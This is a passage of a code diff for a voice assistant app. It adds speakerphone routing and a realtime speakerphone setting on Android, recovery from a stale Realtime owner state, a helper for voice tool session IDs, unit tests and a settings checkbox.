+ * Keep in sync with VoiceService.executeToolCall context creation.
+ */
+export const VOICE_TOOL_SESSION_PREFIX = 'voice:';
+
+export function isRealtimeToolSessionId(sessionId: string | undefined | null): boolean {
+  if (!sessionId) {
+    return false;
+  }
+  return sessionId.startsWith(VOICE_TOOL_SESSION_PREFIX);
+}
+
+export function realtimeToolSessionId(conversationId: string): string {
+  return `${VOICE_TOOL_SESSION_PREFIX}${conversationId}`;
+}

--- a/packages/agent-server/src/voice/service.ts
+++ b/packages/agent-server/src/voice/service.ts
@@ -13,6 +13,7 @@ import {
   negotiateOpenAiRealtimeCall,
   OpenAiRealtimeSideband,
 } from './openaiRealtime';
+import { realtimeToolSessionId } from './constants';
 import { VoiceStore } from './store';
 import type {
   VoiceCapabilities,
@@ -490,7 +491,7 @@ export class VoiceService {
       return;
     }
 
-    const ctx = this.options.createToolContext(`voice:${live.conversationId}`);
+    const ctx = this.options.createToolContext(realtimeToolSessionId(live.conversationId));
     let output: unknown;
     try {
       output = await this.options.toolHost.callTool(name, JSON.stringify(args), ctx);

--- a/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceAudioRouter.java
+++ b/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceAudioRouter.java
@@ -77,6 +77,12 @@ final class AssistantVoiceAudioRouter {
         }
     }
 
+    boolean isSpeakerphoneEnabled() {
+        synchronized (lock) {
+            return speakerphoneEnabled;
+        }
+    }
+
     boolean requestPlaybackFocus(long ownerGeneration) {
         synchronized (lock) {
             if (audioManager == null) {
@@ -168,7 +174,8 @@ final class AssistantVoiceAudioRouter {
                 return;
             }
             if (communicationModeActive) {
-                applySpeakerphoneLocked(preferSpeakerphone);
+                // Keep SCO and speakerphone mutually exclusive if this is re-entered mid-call.
+                applySpeakerphoneLocked(preferSpeakerphone && !scoStarted);
                 return;
             }
             try {
@@ -190,6 +197,10 @@ final class AssistantVoiceAudioRouter {
         }
     }
 
+    /**
+     * Only SCO/HFP (and BLE headset) devices can carry voice-call audio. A2DP is media-only and
+     * must not suppress speakerphone or trigger a non-functional SCO session.
+     */
     private boolean shouldStartBluetoothScoLocked() {
         if (audioManager == null) {
             return false;
@@ -202,8 +213,7 @@ final class AssistantVoiceAudioRouter {
                 : audioManager.getDevices(AudioManager.GET_DEVICES_OUTPUTS)) {
                 int type = device.getType();
                 if (type == android.media.AudioDeviceInfo.TYPE_BLUETOOTH_SCO
-                    || type == android.media.AudioDeviceInfo.TYPE_BLE_HEADSET
-                    || type == android.media.AudioDeviceInfo.TYPE_BLUETOOTH_A2DP) {
+                    || type == android.media.AudioDeviceInfo.TYPE_BLE_HEADSET) {
                     return true;
                 }
             }

--- a/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceAudioRouter.java
+++ b/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceAudioRouter.java
@@ -182,11 +182,19 @@ final class AssistantVoiceAudioRouter {
                 audioManager.setMode(AudioManager.MODE_IN_COMMUNICATION);
                 boolean useSco = shouldStartBluetoothScoLocked();
                 if (useSco) {
+                    Log.d(TAG, "enterCommunicationMode route=sco gen=" + ownerGeneration);
                     audioManager.setBluetoothScoOn(true);
                     audioManager.startBluetoothSco();
                     scoStarted = true;
                     applySpeakerphoneLocked(false);
                 } else {
+                    Log.d(
+                        TAG,
+                        "enterCommunicationMode route=speakerphone prefer="
+                            + preferSpeakerphone
+                            + " gen="
+                            + ownerGeneration
+                    );
                     scoStarted = false;
                     applySpeakerphoneLocked(preferSpeakerphone);
                 }
@@ -228,11 +236,59 @@ final class AssistantVoiceAudioRouter {
             return;
         }
         try {
-            audioManager.setSpeakerphoneOn(enabled);
+            // Prefer setCommunicationDevice(BUILTIN_SPEAKER) on API 31+: setSpeakerphoneOn is
+            // deprecated and can lose to an A2DP media route while still leaving voice quiet.
+            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.S) {
+                if (enabled) {
+                    android.media.AudioDeviceInfo speaker = findBuiltinSpeakerLocked();
+                    if (speaker != null) {
+                        boolean ok = audioManager.setCommunicationDevice(speaker);
+                        if (!ok) {
+                            Log.w(TAG, "setCommunicationDevice(BUILTIN_SPEAKER) returned false");
+                        }
+                    } else {
+                        Log.w(TAG, "no BUILTIN_SPEAKER for communication; falling back");
+                    }
+                    // Keep legacy flag in sync for OEM paths that still honor it.
+                    audioManager.setSpeakerphoneOn(true);
+                } else {
+                    audioManager.clearCommunicationDevice();
+                    audioManager.setSpeakerphoneOn(false);
+                }
+            } else {
+                audioManager.setSpeakerphoneOn(enabled);
+            }
             speakerphoneEnabled = enabled;
         } catch (Exception error) {
             Log.w(TAG, "failed to set speakerphone=" + enabled, error);
         }
+    }
+
+    private android.media.AudioDeviceInfo findBuiltinSpeakerLocked() {
+        if (audioManager == null || Build.VERSION.SDK_INT < Build.VERSION_CODES.S) {
+            return null;
+        }
+        try {
+            for (android.media.AudioDeviceInfo device
+                : audioManager.getAvailableCommunicationDevices()) {
+                if (device.getType() == android.media.AudioDeviceInfo.TYPE_BUILTIN_SPEAKER) {
+                    return device;
+                }
+            }
+        } catch (Exception error) {
+            Log.w(TAG, "failed to list available communication devices", error);
+        }
+        try {
+            for (android.media.AudioDeviceInfo device
+                : audioManager.getDevices(AudioManager.GET_DEVICES_OUTPUTS)) {
+                if (device.getType() == android.media.AudioDeviceInfo.TYPE_BUILTIN_SPEAKER) {
+                    return device;
+                }
+            }
+        } catch (Exception error) {
+            Log.w(TAG, "failed to list output devices for builtin speaker", error);
+        }
+        return null;
     }
 
     void leaveCommunicationMode(long ownerGeneration) {
@@ -401,6 +457,13 @@ final class AssistantVoiceAudioRouter {
                 audioManager.setBluetoothScoOn(false);
             }
             if (speakerphoneEnabled) {
+                if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.S) {
+                    try {
+                        audioManager.clearCommunicationDevice();
+                    } catch (Exception clearError) {
+                        Log.w(TAG, "clearCommunicationDevice failed", clearError);
+                    }
+                }
                 audioManager.setSpeakerphoneOn(false);
             }
             audioManager.setMode(AudioManager.MODE_NORMAL);

--- a/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceAudioRouter.java
+++ b/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceAudioRouter.java
@@ -41,6 +41,7 @@ final class AssistantVoiceAudioRouter {
     private FocusKind focusKind = FocusKind.NONE;
     private boolean communicationModeActive = false;
     private boolean scoStarted = false;
+    private boolean speakerphoneEnabled = false;
     private AudioFocusRequest playbackFocusRequest;
     private AudioFocusRequest captureFocusRequest;
     private AudioFocusRequest realtimeFocusRequest;
@@ -151,23 +152,76 @@ final class AssistantVoiceAudioRouter {
     }
 
     void enterCommunicationMode(long ownerGeneration) {
+        enterCommunicationMode(ownerGeneration, false);
+    }
+
+    /**
+     * @param preferSpeakerphone when true and no Bluetooth SCO headset is in use, force
+     *     speakerphone so Realtime is audible at arm's length (not quiet earpiece).
+     */
+    void enterCommunicationMode(long ownerGeneration, boolean preferSpeakerphone) {
         synchronized (lock) {
             if (ownerGeneration != 0L) {
                 activeOwnerGeneration = ownerGeneration;
             }
-            if (audioManager == null || communicationModeActive) {
-                communicationModeActive = audioManager != null || communicationModeActive;
+            if (audioManager == null) {
+                return;
+            }
+            if (communicationModeActive) {
+                applySpeakerphoneLocked(preferSpeakerphone);
                 return;
             }
             try {
                 audioManager.setMode(AudioManager.MODE_IN_COMMUNICATION);
-                audioManager.setBluetoothScoOn(true);
-                audioManager.startBluetoothSco();
-                scoStarted = true;
+                boolean useSco = shouldStartBluetoothScoLocked();
+                if (useSco) {
+                    audioManager.setBluetoothScoOn(true);
+                    audioManager.startBluetoothSco();
+                    scoStarted = true;
+                    applySpeakerphoneLocked(false);
+                } else {
+                    scoStarted = false;
+                    applySpeakerphoneLocked(preferSpeakerphone);
+                }
                 communicationModeActive = true;
             } catch (Exception error) {
                 Log.w(TAG, "failed to enter communication mode", error);
             }
+        }
+    }
+
+    private boolean shouldStartBluetoothScoLocked() {
+        if (audioManager == null) {
+            return false;
+        }
+        if (Build.VERSION.SDK_INT < Build.VERSION_CODES.M) {
+            return false;
+        }
+        try {
+            for (android.media.AudioDeviceInfo device
+                : audioManager.getDevices(AudioManager.GET_DEVICES_OUTPUTS)) {
+                int type = device.getType();
+                if (type == android.media.AudioDeviceInfo.TYPE_BLUETOOTH_SCO
+                    || type == android.media.AudioDeviceInfo.TYPE_BLE_HEADSET
+                    || type == android.media.AudioDeviceInfo.TYPE_BLUETOOTH_A2DP) {
+                    return true;
+                }
+            }
+        } catch (Exception error) {
+            Log.w(TAG, "failed to inspect audio devices for SCO", error);
+        }
+        return false;
+    }
+
+    private void applySpeakerphoneLocked(boolean enabled) {
+        if (audioManager == null) {
+            return;
+        }
+        try {
+            audioManager.setSpeakerphoneOn(enabled);
+            speakerphoneEnabled = enabled;
+        } catch (Exception error) {
+            Log.w(TAG, "failed to set speakerphone=" + enabled, error);
         }
     }
 
@@ -325,9 +379,10 @@ final class AssistantVoiceAudioRouter {
         if (audioManager == null) {
             communicationModeActive = false;
             scoStarted = false;
+            speakerphoneEnabled = false;
             return;
         }
-        if (!communicationModeActive && !scoStarted) {
+        if (!communicationModeActive && !scoStarted && !speakerphoneEnabled) {
             return;
         }
         try {
@@ -335,11 +390,15 @@ final class AssistantVoiceAudioRouter {
                 audioManager.stopBluetoothSco();
                 audioManager.setBluetoothScoOn(false);
             }
+            if (speakerphoneEnabled) {
+                audioManager.setSpeakerphoneOn(false);
+            }
             audioManager.setMode(AudioManager.MODE_NORMAL);
         } catch (Exception error) {
             Log.w(TAG, "failed to leave communication mode", error);
         }
         scoStarted = false;
+        speakerphoneEnabled = false;
         communicationModeActive = false;
     }
 }

--- a/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceConfig.java
+++ b/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceConfig.java
@@ -43,6 +43,8 @@ final class AssistantVoiceConfig {
     static final boolean DEFAULT_STANDALONE_NOTIFICATION_PLAYBACK_ENABLED = true;
     static final boolean DEFAULT_NOTIFICATION_TITLE_PLAYBACK_ENABLED = false;
     static final boolean DEFAULT_REALTIME_MUTE_ON_START = false;
+    /** Prefer loudspeaker for Realtime when no BT headset (avoids quiet earpiece). */
+    static final boolean DEFAULT_REALTIME_SPEAKERPHONE = true;
     static final String DEFAULT_REALTIME_LISTS_INSTANCE_ID = "default";
 
     private static final String PREFS_NAME = "assistant_voice_runtime";
@@ -75,6 +77,7 @@ final class AssistantVoiceConfig {
         "notification_title_playback_enabled";
     private static final String KEY_REALTIME_CONVERSATION_ID = "realtime_conversation_id";
     private static final String KEY_REALTIME_MUTE_ON_START = "realtime_mute_on_start";
+    private static final String KEY_REALTIME_SPEAKERPHONE = "realtime_speakerphone";
     private static final String KEY_REALTIME_LISTS_INSTANCE_ID = "realtime_lists_instance_id";
     private static final String KEY_RUNTIME_STATE = "runtime_state";
     private static final String KEY_RUNTIME_ERROR = "runtime_error";
@@ -109,6 +112,7 @@ final class AssistantVoiceConfig {
         "notificationTitlePlaybackEnabled";
     static final String EXTRA_REALTIME_CONVERSATION_ID = "realtimeConversationId";
     static final String EXTRA_REALTIME_MUTE_ON_START = "realtimeMuteOnStart";
+    static final String EXTRA_REALTIME_SPEAKERPHONE = "realtimeSpeakerphone";
     static final String EXTRA_REALTIME_LISTS_INSTANCE_ID = "realtimeListsInstanceId";
 
     final String audioMode;
@@ -138,6 +142,7 @@ final class AssistantVoiceConfig {
     final boolean notificationTitlePlaybackEnabled;
     final String realtimeConversationId;
     final boolean realtimeMuteOnStart;
+    final boolean realtimeSpeakerphone;
     final String realtimeListsInstanceId;
 
     AssistantVoiceConfig(
@@ -168,6 +173,7 @@ final class AssistantVoiceConfig {
         boolean notificationTitlePlaybackEnabled,
         String realtimeConversationId,
         boolean realtimeMuteOnStart,
+        boolean realtimeSpeakerphone,
         String realtimeListsInstanceId
     ) {
         this.audioMode = normalizeAudioMode(audioMode);
@@ -218,6 +224,7 @@ final class AssistantVoiceConfig {
         this.notificationTitlePlaybackEnabled = notificationTitlePlaybackEnabled;
         this.realtimeConversationId = normalizeOptional(realtimeConversationId);
         this.realtimeMuteOnStart = realtimeMuteOnStart;
+        this.realtimeSpeakerphone = realtimeSpeakerphone;
         String listsInstance = normalizeOptional(realtimeListsInstanceId);
         this.realtimeListsInstanceId = listsInstance.isEmpty()
             ? DEFAULT_REALTIME_LISTS_INSTANCE_ID
@@ -266,6 +273,7 @@ final class AssistantVoiceConfig {
             ),
             prefs.getString(KEY_REALTIME_CONVERSATION_ID, null),
             prefs.getBoolean(KEY_REALTIME_MUTE_ON_START, DEFAULT_REALTIME_MUTE_ON_START),
+            prefs.getBoolean(KEY_REALTIME_SPEAKERPHONE, DEFAULT_REALTIME_SPEAKERPHONE),
             prefs.getString(KEY_REALTIME_LISTS_INSTANCE_ID, DEFAULT_REALTIME_LISTS_INSTANCE_ID)
         );
     }
@@ -309,6 +317,7 @@ final class AssistantVoiceConfig {
             )
             .putString(KEY_REALTIME_CONVERSATION_ID, config.realtimeConversationId)
             .putBoolean(KEY_REALTIME_MUTE_ON_START, config.realtimeMuteOnStart)
+            .putBoolean(KEY_REALTIME_SPEAKERPHONE, config.realtimeSpeakerphone)
             .putString(KEY_REALTIME_LISTS_INSTANCE_ID, config.realtimeListsInstanceId)
             .apply();
     }
@@ -394,6 +403,7 @@ final class AssistantVoiceConfig {
                 ? intent.getStringExtra(EXTRA_REALTIME_CONVERSATION_ID)
                 : fallback.realtimeConversationId,
             intent.getBooleanExtra(EXTRA_REALTIME_MUTE_ON_START, fallback.realtimeMuteOnStart),
+            intent.getBooleanExtra(EXTRA_REALTIME_SPEAKERPHONE, fallback.realtimeSpeakerphone),
             intent.hasExtra(EXTRA_REALTIME_LISTS_INSTANCE_ID)
                 ? intent.getStringExtra(EXTRA_REALTIME_LISTS_INSTANCE_ID)
                 : fallback.realtimeListsInstanceId
@@ -433,6 +443,7 @@ final class AssistantVoiceConfig {
         );
         intent.putExtra(EXTRA_REALTIME_CONVERSATION_ID, emptyToNull(realtimeConversationId));
         intent.putExtra(EXTRA_REALTIME_MUTE_ON_START, realtimeMuteOnStart);
+        intent.putExtra(EXTRA_REALTIME_SPEAKERPHONE, realtimeSpeakerphone);
         intent.putExtra(EXTRA_REALTIME_LISTS_INSTANCE_ID, emptyToNull(realtimeListsInstanceId));
         return intent;
     }
@@ -612,6 +623,8 @@ final class AssistantVoiceConfig {
 
             realtimeMuteOnStart,
 
+            realtimeSpeakerphone,
+
             realtimeListsInstanceId
         );
     }
@@ -647,6 +660,8 @@ final class AssistantVoiceConfig {
             realtimeConversationId,
 
             realtimeMuteOnStart,
+
+            realtimeSpeakerphone,
 
             realtimeListsInstanceId
         );
@@ -688,6 +703,7 @@ final class AssistantVoiceConfig {
             && notificationTitlePlaybackEnabled == config.notificationTitlePlaybackEnabled
             && Objects.equals(realtimeConversationId, config.realtimeConversationId)
             && realtimeMuteOnStart == config.realtimeMuteOnStart
+            && realtimeSpeakerphone == config.realtimeSpeakerphone
             && Objects.equals(realtimeListsInstanceId, config.realtimeListsInstanceId);
     }
 
@@ -723,6 +739,8 @@ final class AssistantVoiceConfig {
             realtimeConversationId,
 
             realtimeMuteOnStart,
+
+            realtimeSpeakerphone,
 
             realtimeListsInstanceId
         );
@@ -769,6 +787,7 @@ final class AssistantVoiceConfig {
             ),
             settings.optString("realtimeConversationId", realtimeConversationId),
             settings.optBoolean("realtimeMuteOnStart", realtimeMuteOnStart),
+            settings.optBoolean("realtimeSpeakerphone", realtimeSpeakerphone),
             settings.optString("realtimeListsInstanceId", realtimeListsInstanceId)
         );
     }
@@ -804,6 +823,8 @@ final class AssistantVoiceConfig {
             realtimeConversationId,
 
             realtimeMuteOnStart,
+
+            realtimeSpeakerphone,
 
             realtimeListsInstanceId
         );
@@ -841,6 +862,8 @@ final class AssistantVoiceConfig {
 
             realtimeMuteOnStart,
 
+            realtimeSpeakerphone,
+
             realtimeListsInstanceId
         );
     }
@@ -876,6 +899,8 @@ final class AssistantVoiceConfig {
             realtimeConversationId,
 
             realtimeMuteOnStart,
+
+            realtimeSpeakerphone,
 
             realtimeListsInstanceId
         );
@@ -913,6 +938,8 @@ final class AssistantVoiceConfig {
 
             realtimeMuteOnStart,
 
+            realtimeSpeakerphone,
+
             realtimeListsInstanceId
         );
     }
@@ -949,6 +976,8 @@ final class AssistantVoiceConfig {
 
             realtimeMuteOnStart,
 
+            realtimeSpeakerphone,
+
             realtimeListsInstanceId
         );
     }
@@ -984,6 +1013,8 @@ final class AssistantVoiceConfig {
             realtimeConversationId,
 
             realtimeMuteOnStart,
+
+            realtimeSpeakerphone,
 
             realtimeListsInstanceId
         );

--- a/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoicePlugin.java
+++ b/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoicePlugin.java
@@ -477,6 +477,7 @@ public final class AssistantVoicePlugin extends Plugin {
         voiceSettings.put("voiceRuntimeMode", current.voiceRuntimeMode);
         voiceSettings.put("realtimeConversationId", current.realtimeConversationId);
         voiceSettings.put("realtimeMuteOnStart", current.realtimeMuteOnStart);
+        voiceSettings.put("realtimeSpeakerphone", current.realtimeSpeakerphone);
         voiceSettings.put("realtimeListsInstanceId", current.realtimeListsInstanceId);
         voiceSettings.put("audioMode", current.audioMode);
         voiceSettings.put("autoListenEnabled", current.autoListenEnabled);

--- a/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceRealtimeClient.java
+++ b/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceRealtimeClient.java
@@ -94,6 +94,26 @@ final class AssistantVoiceRealtimeClient {
         long ownerGeneration,
         AssistantVoiceAudioRouter audioRouter
     ) {
+        start(
+            assistantBaseUrl,
+            conversationId,
+            listsInstanceId,
+            muteOnStart,
+            ownerGeneration,
+            audioRouter,
+            false
+        );
+    }
+
+    void start(
+        String assistantBaseUrl,
+        String conversationId,
+        String listsInstanceId,
+        boolean muteOnStart,
+        long ownerGeneration,
+        AssistantVoiceAudioRouter audioRouter,
+        boolean preferSpeakerphone
+    ) {
         executor.execute(() -> {
             try {
                 // Previous stop() leaves terminal=true and may leave WebRTC resources half-torn.
@@ -110,7 +130,8 @@ final class AssistantVoiceRealtimeClient {
                     listsInstanceId,
                     muteOnStart,
                     ownerGeneration,
-                    audioRouter
+                    audioRouter,
+                    preferSpeakerphone
                 );
             } catch (Exception error) {
                 Log.w(TAG, "realtime start failed", error);
@@ -184,7 +205,8 @@ final class AssistantVoiceRealtimeClient {
         String listsInstanceId,
         boolean muteOnStart,
         long ownerGeneration,
-        AssistantVoiceAudioRouter audioRouter
+        AssistantVoiceAudioRouter audioRouter,
+        boolean preferSpeakerphone
     ) throws Exception {
         if (terminal.get()) {
             // Should not happen after start() re-arms terminal=false; treat as hard failure.
@@ -204,7 +226,7 @@ final class AssistantVoiceRealtimeClient {
             if (!focusGranted) {
                 throw new IllegalStateException("audio_focus_denied");
             }
-            audioRouter.enterCommunicationMode(ownerGeneration);
+            audioRouter.enterCommunicationMode(ownerGeneration, preferSpeakerphone);
         }
 
         JSONObject createBody = new JSONObject();

--- a/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceRuntimeService.java
+++ b/packages/mobile-web/android/app/src/main/java/com/assistant/mobile/voice/AssistantVoiceRuntimeService.java
@@ -624,6 +624,11 @@ public final class AssistantVoiceRuntimeService extends Service {
             stopRealtimeCall("config_runtime_mode");
         }
 
+        // Thread mode must not keep a stale Realtime owner fence (blocks IDLE after sockets connect).
+        if (!AssistantVoiceControllerPolicy.isRealtimeRuntimeMode(updated.voiceRuntimeMode)) {
+            recoverStaleRealtimeOwnerIfNeeded("config_thread_mode");
+        }
+
         if (!updated.isEnabled()) {
             clearQueuedVoiceItems();
             stopCurrentInteraction(false, "voice_mode_disabled");
@@ -872,20 +877,30 @@ public final class AssistantVoiceRuntimeService extends Service {
     }
 
     /**
-     * While Realtime is the exclusive owner, only Realtime/error/disabled states may be applied.
-     * Thread socket reconnect handlers must not force IDLE/CONNECTING mid-call.
+     * While a Realtime call is live, Thread socket handlers must not force IDLE/CONNECTING.
+     * If {@code liveOwner} is stale REALTIME but UI is already a Thread state, allow recovery
+     * so Thread mode is not stuck on "connecting" forever.
      */
     static boolean shouldAcceptStateUpdateWhileRealtimeOwner(
         boolean realtimeOwnerActive,
+        String currentState,
         String nextState
     ) {
         if (!realtimeOwnerActive) {
             return true;
         }
-        String normalized = trim(nextState);
-        return isRealtimeActiveState(normalized)
-            || STATE_ERROR.equals(normalized)
-            || STATE_DISABLED.equals(normalized);
+        String next = trim(nextState);
+        if (isRealtimeActiveState(next)
+            || STATE_ERROR.equals(next)
+            || STATE_DISABLED.equals(next)) {
+            return true;
+        }
+        // Stale owner (not actually in a Realtime UI state): allow Thread recovery transitions.
+        if (!isRealtimeActiveState(currentState)) {
+            return true;
+        }
+        // Live Realtime call: reject Thread idle/connecting/speaking/listening stomps.
+        return false;
     }
 
     /** @deprecated Prefer {@link #hasActiveRealtimeInteraction(String, String)}. */
@@ -1291,9 +1306,38 @@ public final class AssistantVoiceRuntimeService extends Service {
             && expectedDescription.equals(channel.getDescription());
     }
 
+    /**
+     * If liveOwner is still Realtime but we are not in a Realtime call UI state (or preference is
+     * Thread), clear the owner fence so Thread sockets can reach IDLE again.
+     */
+    private void recoverStaleRealtimeOwnerIfNeeded(String reason) {
+        if (!AssistantVoiceControllerPolicy.OWNER_REALTIME.equals(liveOwner)) {
+            return;
+        }
+        if (isRealtimeActiveState(runtimeState)
+            && AssistantVoiceControllerPolicy.isRealtimeRuntimeMode(
+                config == null ? "" : config.voiceRuntimeMode
+            )) {
+            return;
+        }
+        Log.w(TAG, "recoverStaleRealtimeOwner reason=" + safe(reason) + " state=" + runtimeState);
+        if (realtimeClient != null && isRealtimeActiveState(runtimeState)) {
+            realtimeClient.stop(reason, false);
+        }
+        releaseRealtimeWakeLock();
+        stopRealtimeOwner(reason, true);
+        if (threadAdmissionPaused) {
+            resumeThreadAdmission();
+        }
+    }
+
     private void connectAdapterSocketIfNeeded() {
         if (destroyed || !config.isEnabled() || adapterSocket != null) {
             return;
+        }
+        if (config != null
+            && !AssistantVoiceControllerPolicy.isRealtimeRuntimeMode(config.voiceRuntimeMode)) {
+            recoverStaleRealtimeOwnerIfNeeded("adapter_connect");
         }
         mainHandler.removeCallbacks(reconnectRunnable);
         updateState(hasActiveInteraction() ? runtimeState : STATE_CONNECTING, null);
@@ -1372,6 +1416,10 @@ public final class AssistantVoiceRuntimeService extends Service {
     private void connectAssistantSocketIfNeeded() {
         if (destroyed || !config.isEnabled() || assistantSocket != null) {
             return;
+        }
+        if (config != null
+            && !AssistantVoiceControllerPolicy.isRealtimeRuntimeMode(config.voiceRuntimeMode)) {
+            recoverStaleRealtimeOwnerIfNeeded("assistant_connect");
         }
 
         mainHandler.removeCallbacks(assistantReconnectRunnable);
@@ -2146,13 +2194,16 @@ public final class AssistantVoiceRuntimeService extends Service {
         prepareRealtimeOwnerPreempt(reason);
         realtimeMuted = config.realtimeMuteOnStart;
         updateState(STATE_REALTIME_CONNECTING, null);
+        // Speakerphone preference is applied inside RealtimeClient via the audio router
+        // (call mode defaults to quiet earpiece without it).
         realtimeClient.start(
             config.assistantBaseUrl,
             config.realtimeConversationId,
             config.realtimeListsInstanceId,
             config.realtimeMuteOnStart,
             controllerGeneration,
-            audioRouter
+            audioRouter,
+            config.realtimeSpeakerphone
         );
     }
 
@@ -3804,10 +3855,11 @@ public final class AssistantVoiceRuntimeService extends Service {
         if (normalizedState.isEmpty()) {
             normalizedState = STATE_DISABLED;
         }
-        // While Realtime owns media, ignore Thread-path idle/connecting/speaking/listening
+        // While a Realtime call is live, ignore Thread-path idle/connecting/speaking/listening
         // stomps from adapter/assistant socket lifecycle (reconnects during a live call).
         if (!shouldAcceptStateUpdateWhileRealtimeOwner(
             AssistantVoiceControllerPolicy.OWNER_REALTIME.equals(liveOwner),
+            previousState,
             normalizedState
         )) {
             Log.d(
@@ -3816,6 +3868,8 @@ public final class AssistantVoiceRuntimeService extends Service {
                     + previousState
                     + " next="
                     + normalizedState
+                    + " liveOwner="
+                    + liveOwner
             );
             return;
         }

--- a/packages/mobile-web/android/app/src/test/java/com/assistant/mobile/voice/AssistantVoiceAudioRouterTest.java
+++ b/packages/mobile-web/android/app/src/test/java/com/assistant/mobile/voice/AssistantVoiceAudioRouterTest.java
@@ -55,6 +55,32 @@ public final class AssistantVoiceAudioRouterTest {
 
         assertEquals(AssistantVoiceAudioRouter.FocusKind.NONE, router.focusKind());
         assertFalse(router.isCommunicationModeActive());
+        assertFalse(router.isSpeakerphoneEnabled());
         assertEquals(0L, router.activeOwnerGeneration());
+    }
+
+    @Test
+    public void preferSpeakerphoneEnablesLoudspeakerWhenNoScoHeadset() {
+        AssistantVoiceAudioRouter router =
+            new AssistantVoiceAudioRouter(RuntimeEnvironment.getApplication());
+
+        router.enterCommunicationMode(5L, true);
+        assertTrue(router.isCommunicationModeActive());
+        // No BT SCO/BLE headset in Robolectric defaults → speakerphone preference applies.
+        assertTrue(router.isSpeakerphoneEnabled());
+
+        router.leaveCommunicationMode(5L);
+        assertFalse(router.isCommunicationModeActive());
+        assertFalse(router.isSpeakerphoneEnabled());
+    }
+
+    @Test
+    public void preferSpeakerphoneFalseLeavesSpeakerphoneOff() {
+        AssistantVoiceAudioRouter router =
+            new AssistantVoiceAudioRouter(RuntimeEnvironment.getApplication());
+
+        router.enterCommunicationMode(5L, false);
+        assertTrue(router.isCommunicationModeActive());
+        assertFalse(router.isSpeakerphoneEnabled());
     }
 }

--- a/packages/mobile-web/android/app/src/test/java/com/assistant/mobile/voice/AssistantVoiceConfigTest.java
+++ b/packages/mobile-web/android/app/src/test/java/com/assistant/mobile/voice/AssistantVoiceConfigTest.java
@@ -211,6 +211,7 @@ public final class AssistantVoiceConfigTest {
             false,
             "",
             false,
+            true,
             AssistantVoiceConfig.DEFAULT_REALTIME_LISTS_INSTANCE_ID
         );
     }
@@ -319,6 +320,7 @@ public final class AssistantVoiceConfigTest {
             false,
             "",
             false,
+            true,
             AssistantVoiceConfig.DEFAULT_REALTIME_LISTS_INSTANCE_ID
         );
     }

--- a/packages/mobile-web/android/app/src/test/java/com/assistant/mobile/voice/AssistantVoiceRuntimeServiceTest.java
+++ b/packages/mobile-web/android/app/src/test/java/com/assistant/mobile/voice/AssistantVoiceRuntimeServiceTest.java
@@ -662,10 +662,29 @@ public final class AssistantVoiceRuntimeServiceTest {
     @Test
     @Config(sdk = Build.VERSION_CODES.N)
     public void shouldAcceptStateUpdateWhileRealtimeOwnerBlocksThreadStates() {
+        // Not in a Realtime call: allow Thread states even if owner flag is stale.
         assertEquals(
             true,
             AssistantVoiceRuntimeService.shouldAcceptStateUpdateWhileRealtimeOwner(
                 false,
+                AssistantVoiceRuntimeService.STATE_CONNECTING,
+                AssistantVoiceRuntimeService.STATE_IDLE
+            )
+        );
+        assertEquals(
+            true,
+            AssistantVoiceRuntimeService.shouldAcceptStateUpdateWhileRealtimeOwner(
+                true,
+                AssistantVoiceRuntimeService.STATE_CONNECTING,
+                AssistantVoiceRuntimeService.STATE_IDLE
+            )
+        );
+        // Live Realtime call: block Thread idle/connecting stomps.
+        assertEquals(
+            false,
+            AssistantVoiceRuntimeService.shouldAcceptStateUpdateWhileRealtimeOwner(
+                true,
+                AssistantVoiceRuntimeService.STATE_REALTIME_ACTIVE,
                 AssistantVoiceRuntimeService.STATE_IDLE
             )
         );
@@ -673,13 +692,7 @@ public final class AssistantVoiceRuntimeServiceTest {
             false,
             AssistantVoiceRuntimeService.shouldAcceptStateUpdateWhileRealtimeOwner(
                 true,
-                AssistantVoiceRuntimeService.STATE_IDLE
-            )
-        );
-        assertEquals(
-            false,
-            AssistantVoiceRuntimeService.shouldAcceptStateUpdateWhileRealtimeOwner(
-                true,
+                AssistantVoiceRuntimeService.STATE_REALTIME_ACTIVE,
                 AssistantVoiceRuntimeService.STATE_CONNECTING
             )
         );
@@ -687,6 +700,7 @@ public final class AssistantVoiceRuntimeServiceTest {
             true,
             AssistantVoiceRuntimeService.shouldAcceptStateUpdateWhileRealtimeOwner(
                 true,
+                AssistantVoiceRuntimeService.STATE_REALTIME_CONNECTING,
                 AssistantVoiceRuntimeService.STATE_REALTIME_ACTIVE
             )
         );
@@ -694,6 +708,7 @@ public final class AssistantVoiceRuntimeServiceTest {
             true,
             AssistantVoiceRuntimeService.shouldAcceptStateUpdateWhileRealtimeOwner(
                 true,
+                AssistantVoiceRuntimeService.STATE_REALTIME_ACTIVE,
                 AssistantVoiceRuntimeService.STATE_ERROR
             )
         );
@@ -1340,6 +1355,7 @@ public final class AssistantVoiceRuntimeServiceTest {
             false,
             "",
             false,
+            true,
             AssistantVoiceConfig.DEFAULT_REALTIME_LISTS_INSTANCE_ID
         );
     }

--- a/packages/web-client/public/index.html
+++ b/packages/web-client/public/index.html
@@ -357,6 +357,10 @@
               <input type="checkbox" id="realtime-mute-on-start-checkbox" />
               Mute Realtime on start
             </label>
+            <label class="settings-dropdown-item" for="realtime-speakerphone-checkbox">
+              <input type="checkbox" id="realtime-speakerphone-checkbox" checked />
+              Realtime speakerphone (loudspeaker when no headset)
+            </label>
             <div class="voice-settings-actions" style="display: flex; gap: 8px; flex-wrap: wrap">
               <button type="button" id="realtime-start-button" class="list-item-form-input">
                 Start Realtime call

--- a/packages/web-client/src/controllers/speechAudioController.test.ts
